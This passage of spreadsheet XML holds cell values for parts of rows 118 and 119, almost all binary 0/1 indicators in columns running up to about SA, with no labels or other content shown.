      <c r="HW118">
        <v>0</v>
      </c>
      <c r="HX118">
        <v>0</v>
      </c>
      <c r="HY118">
        <v>0</v>
      </c>
      <c r="HZ118">
        <v>0</v>
      </c>
      <c r="IA118">
        <v>0</v>
      </c>
      <c r="IB118">
        <v>0</v>
      </c>
      <c r="IC118">
        <v>0</v>
      </c>
      <c r="ID118">
        <v>0</v>
      </c>
      <c r="IE118">
        <v>0</v>
      </c>
      <c r="IF118">
        <v>0</v>
      </c>
      <c r="IG118">
        <v>0</v>
      </c>
      <c r="IH118">
        <v>1</v>
      </c>
      <c r="II118">
        <v>0</v>
      </c>
      <c r="IJ118">
        <v>1</v>
      </c>
      <c r="IK118">
        <v>0</v>
      </c>
      <c r="IL118">
        <v>0</v>
      </c>
      <c r="IM118">
        <v>0</v>
      </c>
      <c r="IN118">
        <v>0</v>
      </c>
      <c r="IO118">
        <v>0</v>
      </c>
      <c r="IP118">
        <v>0</v>
      </c>
      <c r="IQ118">
        <v>0</v>
      </c>
      <c r="IR118">
        <v>0</v>
      </c>
      <c r="IS118">
        <v>0</v>
      </c>
      <c r="IT118">
        <v>1</v>
      </c>
      <c r="IU118">
        <v>0</v>
      </c>
      <c r="IV118">
        <v>0</v>
      </c>
      <c r="IW118">
        <v>0</v>
      </c>
      <c r="IX118">
        <v>0</v>
      </c>
      <c r="IY118">
        <v>0</v>
      </c>
      <c r="IZ118">
        <v>0</v>
      </c>
      <c r="JA118">
        <v>0</v>
      </c>
      <c r="JB118">
        <v>0</v>
      </c>
      <c r="JC118">
        <v>0</v>
      </c>
      <c r="JD118">
        <v>0</v>
      </c>
      <c r="JE118">
        <v>0</v>
      </c>
      <c r="JF118">
        <v>0</v>
      </c>
      <c r="JG118">
        <v>0</v>
      </c>
      <c r="JH118">
        <v>0</v>
      </c>
      <c r="JI118">
        <v>0</v>
      </c>
      <c r="JJ118">
        <v>0</v>
      </c>
      <c r="JK118">
        <v>0</v>
      </c>
      <c r="JL118">
        <v>0</v>
      </c>
      <c r="JM118">
        <v>0</v>
      </c>
      <c r="JN118">
        <v>0</v>
      </c>
      <c r="JO118">
        <v>0</v>
      </c>
      <c r="JP118">
        <v>0</v>
      </c>
      <c r="JQ118">
        <v>0</v>
      </c>
      <c r="JR118">
        <v>0</v>
      </c>
      <c r="JS118">
        <v>0</v>
      </c>
      <c r="JT118">
        <v>0</v>
      </c>
      <c r="JU118">
        <v>0</v>
      </c>
      <c r="JV118">
        <v>0</v>
      </c>
      <c r="JW118">
        <v>0</v>
      </c>
      <c r="JX118">
        <v>0</v>
      </c>
      <c r="JY118">
        <v>0</v>
      </c>
      <c r="JZ118">
        <v>0</v>
      </c>
      <c r="KA118">
        <v>0</v>
      </c>
      <c r="KB118">
        <v>0</v>
      </c>
      <c r="KC118">
        <v>0</v>
      </c>
      <c r="KD118">
        <v>0</v>
      </c>
      <c r="KE118">
        <v>0</v>
      </c>
      <c r="KF118">
        <v>0</v>
      </c>
      <c r="KG118">
        <v>0</v>
      </c>
      <c r="KH118">
        <v>0</v>
      </c>
      <c r="KI118">
        <v>0</v>
      </c>
      <c r="KJ118">
        <v>0</v>
      </c>
      <c r="KK118">
        <v>0</v>
      </c>
      <c r="KL118">
        <v>0</v>
      </c>
      <c r="KM118">
        <v>0</v>
      </c>
      <c r="KN118">
        <v>0</v>
      </c>
      <c r="KO118">
        <v>0</v>
      </c>
      <c r="KP118">
        <v>0</v>
      </c>
      <c r="KQ118">
        <v>1</v>
      </c>
      <c r="KR118">
        <v>0</v>
      </c>
      <c r="KS118">
        <v>0</v>
      </c>
      <c r="KT118">
        <v>0</v>
      </c>
      <c r="KU118">
        <v>0</v>
      </c>
      <c r="KV118">
        <v>0</v>
      </c>
      <c r="KW118">
        <v>0</v>
      </c>
      <c r="KX118">
        <v>0</v>
      </c>
      <c r="KY118">
        <v>0</v>
      </c>
      <c r="KZ118">
        <v>0</v>
      </c>
      <c r="LA118">
        <v>0</v>
      </c>
      <c r="LB118">
        <v>0</v>
      </c>
      <c r="LC118">
        <v>0</v>
      </c>
      <c r="LD118">
        <v>0</v>
      </c>
      <c r="LE118">
        <v>0</v>
      </c>
      <c r="LF118">
        <v>0</v>
      </c>
      <c r="LG118">
        <v>0</v>
      </c>
      <c r="LH118">
        <v>0</v>
      </c>
      <c r="LI118">
        <v>0</v>
      </c>
      <c r="LJ118">
        <v>0</v>
      </c>
      <c r="LK118">
        <v>0</v>
      </c>
      <c r="LL118">
        <v>1</v>
      </c>
      <c r="LM118">
        <v>0</v>
      </c>
      <c r="LN118">
        <v>0</v>
      </c>
      <c r="LO118">
        <v>0</v>
      </c>
      <c r="LP118">
        <v>1</v>
      </c>
      <c r="LQ118">
        <v>0</v>
      </c>
      <c r="LR118">
        <v>0</v>
      </c>
      <c r="LS118">
        <v>0</v>
      </c>
      <c r="LT118">
        <v>0</v>
      </c>
      <c r="LU118">
        <v>0</v>
      </c>
      <c r="LV118">
        <v>0</v>
      </c>
      <c r="LW118">
        <v>0</v>
      </c>
      <c r="LX118">
        <v>0</v>
      </c>
      <c r="LY118">
        <v>0</v>
      </c>
      <c r="LZ118">
        <v>0</v>
      </c>
      <c r="MA118">
        <v>0</v>
      </c>
      <c r="MB118">
        <v>0</v>
      </c>
      <c r="MC118">
        <v>0</v>
      </c>
      <c r="MD118">
        <v>0</v>
      </c>
      <c r="ME118">
        <v>0</v>
      </c>
      <c r="MF118">
        <v>0</v>
      </c>
      <c r="MG118">
        <v>0</v>
      </c>
      <c r="MH118">
        <v>0</v>
      </c>
      <c r="MI118">
        <v>0</v>
      </c>
      <c r="MJ118">
        <v>0</v>
      </c>
      <c r="MK118">
        <v>0</v>
      </c>
      <c r="ML118">
        <v>0</v>
      </c>
      <c r="MM118">
        <v>0</v>
      </c>
      <c r="MN118">
        <v>0</v>
      </c>
      <c r="MO118">
        <v>0</v>
      </c>
      <c r="MP118">
        <v>0</v>
      </c>
      <c r="MQ118">
        <v>0</v>
      </c>
      <c r="MR118">
        <v>0</v>
      </c>
      <c r="MS118">
        <v>0</v>
      </c>
      <c r="MT118">
        <v>0</v>
      </c>
      <c r="MU118">
        <v>0</v>
      </c>
      <c r="MV118">
        <v>0</v>
      </c>
      <c r="MW118">
        <v>1</v>
      </c>
      <c r="MX118">
        <v>0</v>
      </c>
      <c r="MY118">
        <v>0</v>
      </c>
      <c r="MZ118">
        <v>0</v>
      </c>
      <c r="NA118">
        <v>0</v>
      </c>
      <c r="NB118">
        <v>0</v>
      </c>
      <c r="NC118">
        <v>0</v>
      </c>
      <c r="ND118">
        <v>0</v>
      </c>
      <c r="NE118">
        <v>0</v>
      </c>
      <c r="NF118">
        <v>0</v>
      </c>
      <c r="NG118">
        <v>0</v>
      </c>
      <c r="NH118">
        <v>0</v>
      </c>
      <c r="NI118">
        <v>0</v>
      </c>
      <c r="NJ118">
        <v>0</v>
      </c>
      <c r="NK118">
        <v>0</v>
      </c>
      <c r="NL118">
        <v>0</v>
      </c>
      <c r="NM118">
        <v>0</v>
      </c>
      <c r="NN118">
        <v>0</v>
      </c>
      <c r="NO118">
        <v>0</v>
      </c>
      <c r="NP118">
        <v>0</v>
      </c>
      <c r="NQ118">
        <v>0</v>
      </c>
      <c r="NR118">
        <v>0</v>
      </c>
      <c r="NS118">
        <v>0</v>
      </c>
      <c r="NT118">
        <v>0</v>
      </c>
      <c r="NU118">
        <v>0</v>
      </c>
      <c r="NV118">
        <v>0</v>
      </c>
      <c r="NW118">
        <v>0</v>
      </c>
      <c r="NX118">
        <v>1</v>
      </c>
      <c r="NY118">
        <v>0</v>
      </c>
      <c r="NZ118">
        <v>0</v>
      </c>
      <c r="OA118">
        <v>0</v>
      </c>
      <c r="OB118">
        <v>0</v>
      </c>
      <c r="OC118">
        <v>0</v>
      </c>
      <c r="OD118">
        <v>0</v>
      </c>
      <c r="OE118">
        <v>0</v>
      </c>
      <c r="OF118">
        <v>0</v>
      </c>
      <c r="OG118">
        <v>0</v>
      </c>
      <c r="OH118">
        <v>1</v>
      </c>
      <c r="OI118">
        <v>0</v>
      </c>
      <c r="OJ118">
        <v>0</v>
      </c>
      <c r="OK118">
        <v>0</v>
      </c>
      <c r="OL118">
        <v>0</v>
      </c>
      <c r="OM118">
        <v>0</v>
      </c>
      <c r="ON118">
        <v>0</v>
      </c>
      <c r="OO118">
        <v>0</v>
      </c>
      <c r="OP118">
        <v>0</v>
      </c>
      <c r="OQ118">
        <v>0</v>
      </c>
      <c r="OR118">
        <v>1</v>
      </c>
      <c r="OS118">
        <v>0</v>
      </c>
      <c r="OT118">
        <v>0</v>
      </c>
      <c r="OU118">
        <v>0</v>
      </c>
      <c r="OV118">
        <v>0</v>
      </c>
      <c r="OW118">
        <v>0</v>
      </c>
      <c r="OX118">
        <v>0</v>
      </c>
      <c r="OY118">
        <v>0</v>
      </c>
      <c r="OZ118">
        <v>0</v>
      </c>
      <c r="PA118">
        <v>0</v>
      </c>
      <c r="PB118">
        <v>0</v>
      </c>
      <c r="PC118">
        <v>0</v>
      </c>
      <c r="PD118">
        <v>0</v>
      </c>
      <c r="PE118">
        <v>0</v>
      </c>
      <c r="PF118">
        <v>1</v>
      </c>
      <c r="PG118">
        <v>0</v>
      </c>
      <c r="PH118">
        <v>0</v>
      </c>
      <c r="PI118">
        <v>0</v>
      </c>
      <c r="PJ118">
        <v>0</v>
      </c>
      <c r="PK118">
        <v>0</v>
      </c>
      <c r="PL118">
        <v>0</v>
      </c>
      <c r="PM118">
        <v>0</v>
      </c>
      <c r="PN118">
        <v>0</v>
      </c>
      <c r="PO118">
        <v>0</v>
      </c>
      <c r="PP118">
        <v>0</v>
      </c>
      <c r="PQ118">
        <v>0</v>
      </c>
      <c r="PR118">
        <v>0</v>
      </c>
      <c r="PS118">
        <v>0</v>
      </c>
      <c r="PT118">
        <v>0</v>
      </c>
      <c r="PU118">
        <v>1</v>
      </c>
      <c r="PV118">
        <v>0</v>
      </c>
      <c r="PW118">
        <v>0</v>
      </c>
      <c r="PX118">
        <v>0</v>
      </c>
      <c r="PY118">
        <v>0</v>
      </c>
      <c r="PZ118">
        <v>0</v>
      </c>
      <c r="QA118">
        <v>0</v>
      </c>
      <c r="QB118">
        <v>0</v>
      </c>
      <c r="QC118">
        <v>0</v>
      </c>
      <c r="QD118">
        <v>0</v>
      </c>
      <c r="QE118">
        <v>0</v>
      </c>
      <c r="QF118">
        <v>1</v>
      </c>
      <c r="QG118">
        <v>0</v>
      </c>
      <c r="QH118">
        <v>0</v>
      </c>
      <c r="QI118">
        <v>0</v>
      </c>
      <c r="QJ118">
        <v>0</v>
      </c>
      <c r="QK118">
        <v>0</v>
      </c>
      <c r="QL118">
        <v>0</v>
      </c>
      <c r="QM118">
        <v>0</v>
      </c>
      <c r="QN118">
        <v>0</v>
      </c>
      <c r="QO118">
        <v>1</v>
      </c>
      <c r="QP118">
        <v>0</v>
      </c>
      <c r="QQ118">
        <v>0</v>
      </c>
      <c r="QR118">
        <v>0</v>
      </c>
      <c r="QS118">
        <v>0</v>
      </c>
      <c r="QT118">
        <v>0</v>
      </c>
      <c r="QU118">
        <v>0</v>
      </c>
      <c r="QV118">
        <v>0</v>
      </c>
      <c r="QW118">
        <v>0</v>
      </c>
      <c r="QX118">
        <v>0</v>
      </c>
      <c r="QY118">
        <v>0</v>
      </c>
      <c r="QZ118">
        <v>0</v>
      </c>
      <c r="RA118">
        <v>0</v>
      </c>
      <c r="RB118">
        <v>0</v>
      </c>
      <c r="RC118">
        <v>0</v>
      </c>
      <c r="RD118">
        <v>0</v>
      </c>
      <c r="RE118">
        <v>0</v>
      </c>
      <c r="RF118">
        <v>0</v>
      </c>
      <c r="RG118">
        <v>0</v>
      </c>
      <c r="RH118">
        <v>0</v>
      </c>
      <c r="RI118">
        <v>0</v>
      </c>
      <c r="RJ118">
        <v>0</v>
      </c>
      <c r="RK118">
        <v>0</v>
      </c>
      <c r="RL118">
        <v>0</v>
      </c>
      <c r="RM118">
        <v>0</v>
      </c>
      <c r="RN118">
        <v>0</v>
      </c>
      <c r="RO118">
        <v>0</v>
      </c>
      <c r="RP118">
        <v>0</v>
      </c>
      <c r="RQ118">
        <v>0</v>
      </c>
      <c r="RR118">
        <v>0</v>
      </c>
      <c r="RS118">
        <v>0</v>
      </c>
      <c r="RT118">
        <v>0</v>
      </c>
      <c r="RU118">
        <v>0</v>
      </c>
      <c r="RV118">
        <v>0</v>
      </c>
      <c r="RW118">
        <v>0</v>
      </c>
      <c r="RX118">
        <v>0</v>
      </c>
      <c r="RY118">
        <v>0</v>
      </c>
      <c r="RZ118">
        <v>0</v>
      </c>
      <c r="SA118">
        <v>0</v>
      </c>
    </row>
    <row r="119" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A119" s="6" t="s">
        <v>3776</v>
      </c>
      <c r="B119">
        <v>170</v>
      </c>
      <c r="C119">
        <v>1</v>
      </c>
      <c r="D119">
        <v>1</v>
      </c>
      <c r="E119">
        <v>0</v>
      </c>
      <c r="F119">
        <v>1</v>
      </c>
      <c r="G119">
        <v>0</v>
      </c>
      <c r="H119">
        <v>0</v>
      </c>
      <c r="I119">
        <v>0</v>
      </c>
      <c r="J119">
        <v>0</v>
      </c>
      <c r="K119">
        <v>0</v>
      </c>
      <c r="L119">
        <v>0</v>
      </c>
      <c r="M119">
        <v>1</v>
      </c>
      <c r="N119">
        <v>0</v>
      </c>
      <c r="O119">
        <v>0</v>
      </c>
      <c r="P119">
        <v>1</v>
      </c>
      <c r="Q119">
        <v>1</v>
      </c>
      <c r="R119">
        <v>1</v>
      </c>
      <c r="S119">
        <v>1</v>
      </c>
      <c r="T119">
        <v>1</v>
      </c>
      <c r="U119">
        <v>1</v>
      </c>
      <c r="V119">
        <v>0</v>
      </c>
      <c r="W119">
        <v>1</v>
      </c>
      <c r="X119">
        <v>0</v>
      </c>
      <c r="Y119">
        <v>1</v>
      </c>
      <c r="Z119">
        <v>0</v>
      </c>
      <c r="AA119">
        <v>0</v>
      </c>
      <c r="AB119">
        <v>1</v>
      </c>
      <c r="AC119">
        <v>1</v>
      </c>
      <c r="AD119">
        <v>0</v>
      </c>
      <c r="AE119">
        <v>0</v>
      </c>
      <c r="AF119">
        <v>0</v>
      </c>
      <c r="AG119">
        <v>0</v>
      </c>
      <c r="AH119">
        <v>0</v>
      </c>
      <c r="AI119">
        <v>1</v>
      </c>
      <c r="AJ119">
        <v>1</v>
      </c>
      <c r="AK119">
        <v>1</v>
      </c>
      <c r="AL119">
        <v>1</v>
      </c>
      <c r="AM119">
        <v>0</v>
      </c>
      <c r="AN119">
        <v>1</v>
      </c>
      <c r="AO119">
        <v>1</v>
      </c>
      <c r="AP119">
        <v>0</v>
      </c>
      <c r="AQ119">
        <v>0</v>
      </c>
      <c r="AR119">
        <v>0</v>
      </c>
      <c r="AS119">
        <v>1</v>
      </c>
      <c r="AT119">
        <v>1</v>
      </c>
      <c r="AU119">
        <v>0</v>
      </c>
      <c r="AV119">
        <v>0</v>
      </c>
      <c r="AW119">
        <v>1</v>
      </c>
      <c r="AX119">
        <v>0</v>
      </c>
      <c r="AY119">
        <v>0</v>
      </c>
      <c r="AZ119">
        <v>0</v>
      </c>
      <c r="BA119">
        <v>0</v>
      </c>
      <c r="BB119">
        <v>0</v>
      </c>
      <c r="BC119">
        <v>0</v>
      </c>
      <c r="BD119">
        <v>1</v>
      </c>
      <c r="BE119">
        <v>1</v>
      </c>
      <c r="BF119">
        <v>0</v>
      </c>
      <c r="BG119">
        <v>0</v>
      </c>
      <c r="BH119">
        <v>0</v>
      </c>
      <c r="BI119">
        <v>0</v>
      </c>
      <c r="BJ119">
        <v>0</v>
      </c>
      <c r="BK119">
        <v>0</v>
      </c>
      <c r="BL119">
        <v>1</v>
      </c>
      <c r="BM119">
        <v>0</v>
      </c>
      <c r="BN119">
        <v>0</v>
      </c>
      <c r="BO119">
        <v>0</v>
      </c>
      <c r="BP119">
        <v>1</v>
      </c>
      <c r="BQ119">
        <v>0</v>
      </c>
      <c r="BR119">
        <v>1</v>
      </c>
      <c r="BS119">
        <v>1</v>
      </c>
      <c r="BT119">
        <v>0</v>
      </c>
      <c r="BU119">
        <v>0</v>
      </c>
      <c r="BV119">
        <v>1</v>
      </c>
      <c r="BW119">
        <v>0</v>
      </c>
      <c r="BX119">
        <v>0</v>
      </c>
      <c r="BY119">
        <v>0</v>
      </c>
      <c r="BZ119">
        <v>0</v>
      </c>
      <c r="CA119">
        <v>0</v>
      </c>
      <c r="CB119">
        <v>0</v>
      </c>
      <c r="CC119">
        <v>0</v>
      </c>
      <c r="CD119">
        <v>1</v>
      </c>
      <c r="CE119">
        <v>1</v>
      </c>
      <c r="CF119">
        <v>1</v>
      </c>
      <c r="CG119">
        <v>0</v>
      </c>
      <c r="CH119">
        <v>1</v>
      </c>
      <c r="CI119">
        <v>1</v>
      </c>
      <c r="CJ119">
        <v>1</v>
      </c>
      <c r="CK119">
        <v>0</v>
      </c>
      <c r="CL119">
        <v>1</v>
      </c>
      <c r="CM119">
        <v>1</v>
      </c>
      <c r="CN119">
        <v>0</v>
      </c>
      <c r="CO119">
        <v>1</v>
      </c>
      <c r="CP119">
        <v>0</v>
      </c>
      <c r="CQ119">
        <v>0</v>
      </c>
      <c r="CR119">
        <v>0</v>
      </c>
      <c r="CS119">
        <v>1</v>
      </c>
      <c r="CT119">
        <v>1</v>
      </c>
      <c r="CU119">
        <v>0</v>
      </c>
      <c r="CV119">
        <v>0</v>
      </c>
      <c r="CW119">
        <v>1</v>
      </c>
      <c r="CX119">
        <v>0</v>
      </c>
      <c r="CY119">
        <v>0</v>
      </c>
      <c r="CZ119">
        <v>0</v>
      </c>
      <c r="DA119">
        <v>1</v>
      </c>
      <c r="DB119">
        <v>0</v>
      </c>
      <c r="DC119">
        <v>1</v>
      </c>
      <c r="DD119">
        <v>0</v>
      </c>
      <c r="DE119">
        <v>1</v>
      </c>
      <c r="DF119">
        <v>0</v>
      </c>
      <c r="DG119">
        <v>0</v>
      </c>
      <c r="DH119">
        <v>1</v>
      </c>
      <c r="DI119">
        <v>0</v>
      </c>
      <c r="DJ119">
        <v>1</v>
      </c>
      <c r="DK119">
        <v>0</v>
      </c>
      <c r="DL119">
        <v>1</v>
      </c>
      <c r="DM119">
        <v>0</v>
      </c>
      <c r="DN119">
        <v>0</v>
      </c>
      <c r="DO119">
        <v>1</v>
      </c>
      <c r="DP119">
        <v>1</v>
      </c>
      <c r="DQ119">
        <v>0</v>
      </c>
      <c r="DR119">
        <v>0</v>
      </c>
      <c r="DS119">
        <v>0</v>
      </c>
      <c r="DT119">
        <v>0</v>
      </c>
      <c r="DU119">
        <v>0</v>
      </c>
      <c r="DV119">
        <v>0</v>
      </c>
      <c r="DW119">
        <v>1</v>
      </c>
      <c r="DX119">
        <v>0</v>
      </c>
      <c r="DY119">
        <v>1</v>
      </c>
      <c r="DZ119">
        <v>0</v>
      </c>
      <c r="EA119">
        <v>0</v>
      </c>
      <c r="EB119">
        <v>0</v>
      </c>
      <c r="EC119">
        <v>1</v>
      </c>
      <c r="ED119">
        <v>0</v>
      </c>
      <c r="EE119">
        <v>0</v>
      </c>
      <c r="EF119">
        <v>1</v>
      </c>
      <c r="EG119">
        <v>0</v>
      </c>
      <c r="EH119">
        <v>0</v>
      </c>
      <c r="EI119">
        <v>0</v>
      </c>
      <c r="EJ119">
        <v>0</v>
      </c>
      <c r="EK119">
        <v>1</v>
      </c>
      <c r="EL119">
        <v>0</v>
      </c>
      <c r="EM119">
        <v>1</v>
      </c>
      <c r="EN119">
        <v>1</v>
      </c>
      <c r="EO119">
        <v>0</v>
      </c>
      <c r="EP119">
        <v>0</v>
      </c>
      <c r="EQ119">
        <v>0</v>
      </c>
      <c r="ER119">
        <v>1</v>
      </c>
      <c r="ES119">
        <v>0</v>
      </c>
      <c r="ET119">
        <v>1</v>
      </c>
      <c r="EU119">
        <v>0</v>
      </c>
      <c r="EV119">
        <v>0</v>
      </c>
      <c r="EW119">
        <v>1</v>
      </c>
      <c r="EX119">
        <v>0</v>
      </c>
      <c r="EY119">
        <v>0</v>
      </c>
      <c r="EZ119">
        <v>1</v>
      </c>
      <c r="FA119">
        <v>0</v>
      </c>
      <c r="FB119">
        <v>0</v>
      </c>
      <c r="FC119">
        <v>0</v>
      </c>
      <c r="FD119">
        <v>0</v>
      </c>
      <c r="FE119">
        <v>0</v>
      </c>
      <c r="FF119">
        <v>0</v>
      </c>
      <c r="FG119">
        <v>0</v>
      </c>
      <c r="FH119">
        <v>0</v>
      </c>
      <c r="FI119">
        <v>0</v>
      </c>
      <c r="FJ119">
        <v>0</v>
      </c>
      <c r="FK119">
        <v>0</v>
      </c>
      <c r="FL119">
        <v>1</v>
      </c>
      <c r="FM119">
        <v>0</v>
      </c>
      <c r="FN119">
        <v>1</v>
      </c>
      <c r="FO119">
        <v>0</v>
      </c>
      <c r="FP119">
        <v>0</v>
      </c>
      <c r="FQ119">
        <v>0</v>
      </c>
      <c r="FR119">
        <v>0</v>
      </c>
      <c r="FS119">
        <v>0</v>
      </c>
      <c r="FT119">
        <v>0</v>
      </c>
      <c r="FU119">
        <v>0</v>
      </c>
      <c r="FV119">
        <v>0</v>
      </c>
      <c r="FW119">
        <v>1</v>
      </c>
      <c r="FX119">
        <v>1</v>
      </c>
      <c r="FY119">
        <v>0</v>
      </c>
      <c r="FZ119">
        <v>0</v>
      </c>
      <c r="GA119">
        <v>0</v>
      </c>
      <c r="GB119">
        <v>0</v>
      </c>
      <c r="GC119">
        <v>1</v>
      </c>
      <c r="GD119">
        <v>0</v>
      </c>
      <c r="GE119">
        <v>1</v>
      </c>
      <c r="GF119">
        <v>1</v>
      </c>
      <c r="GG119">
        <v>0</v>
      </c>
      <c r="GH119">
        <v>0</v>
      </c>
      <c r="GI119">
        <v>1</v>
      </c>
      <c r="GJ119">
        <v>0</v>
      </c>
      <c r="GK119">
        <v>0</v>
      </c>
      <c r="GL119">
        <v>1</v>
      </c>
      <c r="GM119">
        <v>0</v>
      </c>
      <c r="GN119">
        <v>0</v>
      </c>
      <c r="GO119">
        <v>0</v>
      </c>
      <c r="GP119">
        <v>1</v>
      </c>
      <c r="GQ119">
        <v>1</v>
      </c>
      <c r="GR119">
        <v>0</v>
      </c>
      <c r="GS119">
        <v>1</v>
      </c>
      <c r="GT119">
        <v>1</v>
      </c>
      <c r="GU119">
        <v>1</v>
      </c>
      <c r="GV119">
        <v>0</v>
      </c>
      <c r="GW119">
        <v>0</v>
      </c>
      <c r="GX119">
        <v>1</v>
      </c>
      <c r="GY119">
        <v>0</v>
      </c>
      <c r="GZ119">
        <v>1</v>
      </c>
      <c r="HA119">
        <v>1</v>
      </c>
      <c r="HB119">
        <v>0</v>
      </c>
      <c r="HC119">
        <v>0</v>
      </c>
      <c r="HD119">
        <v>1</v>
      </c>
      <c r="HE119">
        <v>0</v>
      </c>
      <c r="HF119">
        <v>0</v>
      </c>
      <c r="HG119">
        <v>0</v>
      </c>
      <c r="HH119">
        <v>1</v>
      </c>
      <c r="HI119">
        <v>0</v>
      </c>
      <c r="HJ119">
        <v>0</v>
      </c>
      <c r="HK119">
        <v>0</v>
      </c>
      <c r="HL119">
        <v>0</v>
      </c>
      <c r="HM119">
        <v>1</v>
      </c>
      <c r="HN119">
        <v>0</v>
      </c>
      <c r="HO119">
        <v>0</v>
      </c>
      <c r="HP119">
        <v>0</v>
      </c>
      <c r="HQ119">
        <v>0</v>
      </c>
      <c r="HR119">
        <v>0</v>
      </c>
      <c r="HS119">
        <v>1</v>
      </c>
      <c r="HT119">
        <v>0</v>
      </c>
      <c r="HU119">
        <v>0</v>
      </c>
      <c r="HV119">
        <v>1</v>
      </c>
      <c r="HW119">
        <v>0</v>
      </c>
      <c r="HX119">
        <v>0</v>
      </c>
      <c r="HY119">
        <v>0</v>
      </c>
      <c r="HZ119">
        <v>0</v>
      </c>
      <c r="IA119">
        <v>1</v>
      </c>
      <c r="IB119">
        <v>0</v>
      </c>
      <c r="IC119">
        <v>1</v>
      </c>
      <c r="ID119">
        <v>1</v>
      </c>
      <c r="IE119">
        <v>0</v>
      </c>
      <c r="IF119">
        <v>0</v>
      </c>
      <c r="IG119">
        <v>0</v>
      </c>
      <c r="IH119">
        <v>1</v>
      </c>
      <c r="II119">
        <v>0</v>
      </c>
      <c r="IJ119">
        <v>0</v>
      </c>
      <c r="IK119">
        <v>1</v>
      </c>
      <c r="IL119">
        <v>0</v>
      </c>
      <c r="IM119">
        <v>1</v>
      </c>
      <c r="IN119">
        <v>0</v>
      </c>
      <c r="IO119">
        <v>1</v>
      </c>
      <c r="IP119">
        <v>0</v>
      </c>
      <c r="IQ119">
        <v>0</v>
      </c>
      <c r="IR119">
        <v>0</v>
      </c>
      <c r="IS119">
        <v>1</v>
      </c>
      <c r="IT119">
        <v>1</v>
      </c>
      <c r="IU119">
        <v>1</v>
      </c>
      <c r="IV119">
        <v>0</v>
      </c>
      <c r="IW119">
        <v>0</v>
      </c>
      <c r="IX119">
        <v>0</v>
      </c>
      <c r="IY119">
        <v>0</v>
      </c>
      <c r="IZ119">
        <v>0</v>
      </c>
      <c r="JA119">
        <v>0</v>
      </c>
      <c r="JB119">
        <v>0</v>
      </c>
      <c r="JC119">
        <v>0</v>
      </c>
      <c r="JD119">
        <v>0</v>
      </c>
      <c r="JE119">
        <v>0</v>
      </c>
      <c r="JF119">
        <v>0</v>
      </c>
      <c r="JG119">
        <v>0</v>
      </c>
      <c r="JH119">
        <v>0</v>
      </c>
      <c r="JI119">
        <v>1</v>
      </c>
      <c r="JJ119">
        <v>0</v>
      </c>
      <c r="JK119">
        <v>0</v>
      </c>
      <c r="JL119">
        <v>0</v>
      </c>
      <c r="JM119">
        <v>0</v>
      </c>
      <c r="JN119">
        <v>1</v>
      </c>
      <c r="JO119">
        <v>1</v>
      </c>
      <c r="JP119">
        <v>1</v>
      </c>
      <c r="JQ119">
        <v>0</v>
      </c>
      <c r="JR119">
        <v>0</v>
      </c>
      <c r="JS119">
        <v>0</v>
      </c>
      <c r="JT119">
        <v>1</v>
      </c>
      <c r="JU119">
        <v>0</v>
      </c>
      <c r="JV119">
        <v>1</v>
      </c>
      <c r="JW119">
        <v>1</v>
      </c>
      <c r="JX119">
        <v>0</v>
      </c>
      <c r="JY119">
        <v>0</v>
      </c>
      <c r="JZ119">
        <v>0</v>
      </c>
      <c r="KA119">
        <v>1</v>
      </c>
      <c r="KB119">
        <v>1</v>
      </c>
      <c r="KC119">
        <v>0</v>
      </c>
      <c r="KD119">
        <v>0</v>
      </c>
      <c r="KE119">
        <v>0</v>
      </c>
      <c r="KF119">
        <v>0</v>
      </c>
      <c r="KG119">
        <v>1</v>
      </c>
      <c r="KH119">
        <v>0</v>
      </c>
      <c r="KI119">
        <v>0</v>
      </c>
      <c r="KJ119">
        <v>1</v>
      </c>
      <c r="KK119">
        <v>0</v>
      </c>
      <c r="KL119">
        <v>0</v>
      </c>
      <c r="KM119">
        <v>1</v>
      </c>
      <c r="KN119">
        <v>0</v>
      </c>
      <c r="KO119">
        <v>1</v>
      </c>
      <c r="KP119">
        <v>0</v>
      </c>
      <c r="KQ119">
        <v>0</v>
      </c>
      <c r="KR119">
        <v>1</v>
      </c>
      <c r="KS119">
        <v>1</v>
      </c>
      <c r="KT119">
        <v>1</v>
      </c>
      <c r="KU119">
        <v>0</v>
      </c>
      <c r="KV119">
        <v>0</v>
      </c>
      <c r="KW119">
        <v>0</v>
      </c>
      <c r="KX119">
        <v>1</v>
      </c>
      <c r="KY119">
        <v>0</v>
      </c>
      <c r="KZ119">
        <v>1</v>
      </c>
      <c r="LA119">
        <v>0</v>
      </c>
      <c r="LB119">
        <v>0</v>
      </c>
      <c r="LC119">
        <v>0</v>
      </c>
      <c r="LD119">
        <v>1</v>
      </c>
      <c r="LE119">
        <v>0</v>
      </c>
      <c r="LF119">
        <v>1</v>
      </c>
      <c r="LG119">
        <v>0</v>
      </c>
      <c r="LH119">
        <v>1</v>
      </c>
      <c r="LI119">
        <v>1</v>
      </c>
      <c r="LJ119">
        <v>1</v>
      </c>
      <c r="LK119">
        <v>0</v>
      </c>
      <c r="LL119">
        <v>0</v>
      </c>
      <c r="LM119">
        <v>0</v>
      </c>
      <c r="LN119">
        <v>1</v>
      </c>
      <c r="LO119">
        <v>0</v>
      </c>
      <c r="LP119">
        <v>0</v>
      </c>
      <c r="LQ119">
        <v>0</v>
      </c>
      <c r="LR119">
        <v>1</v>
      </c>
      <c r="LS119">
        <v>0</v>
      </c>
      <c r="LT119">
        <v>0</v>
      </c>
      <c r="LU119">
        <v>0</v>
      </c>
      <c r="LV119">
        <v>1</v>
      </c>
      <c r="LW119">
        <v>1</v>
      </c>
      <c r="LX119">
        <v>0</v>
      </c>
      <c r="LY119">
        <v>0</v>
      </c>
      <c r="LZ119">
        <v>1</v>
      </c>
      <c r="MA119">
        <v>0</v>
      </c>
      <c r="MB119">
        <v>0</v>
      </c>
      <c r="MC119">
        <v>0</v>
      </c>
      <c r="MD119">
        <v>1</v>
      </c>
      <c r="ME119">
        <v>0</v>
      </c>
      <c r="MF119">
        <v>0</v>
      </c>
      <c r="MG119">
        <v>0</v>
      </c>
      <c r="MH119">
        <v>1</v>
      </c>
      <c r="MI119">
        <v>1</v>
      </c>
      <c r="MJ119">
        <v>0</v>
      </c>
      <c r="MK119">
        <v>1</v>
      </c>
      <c r="ML119">
        <v>1</v>
      </c>
      <c r="MM119">
        <v>0</v>
      </c>
      <c r="MN119">
        <v>0</v>
      </c>
      <c r="MO119">
        <v>0</v>
      </c>
      <c r="MP119">
        <v>1</v>
      </c>
      <c r="MQ119">
        <v>0</v>
      </c>
      <c r="MR119">
        <v>0</v>
      </c>
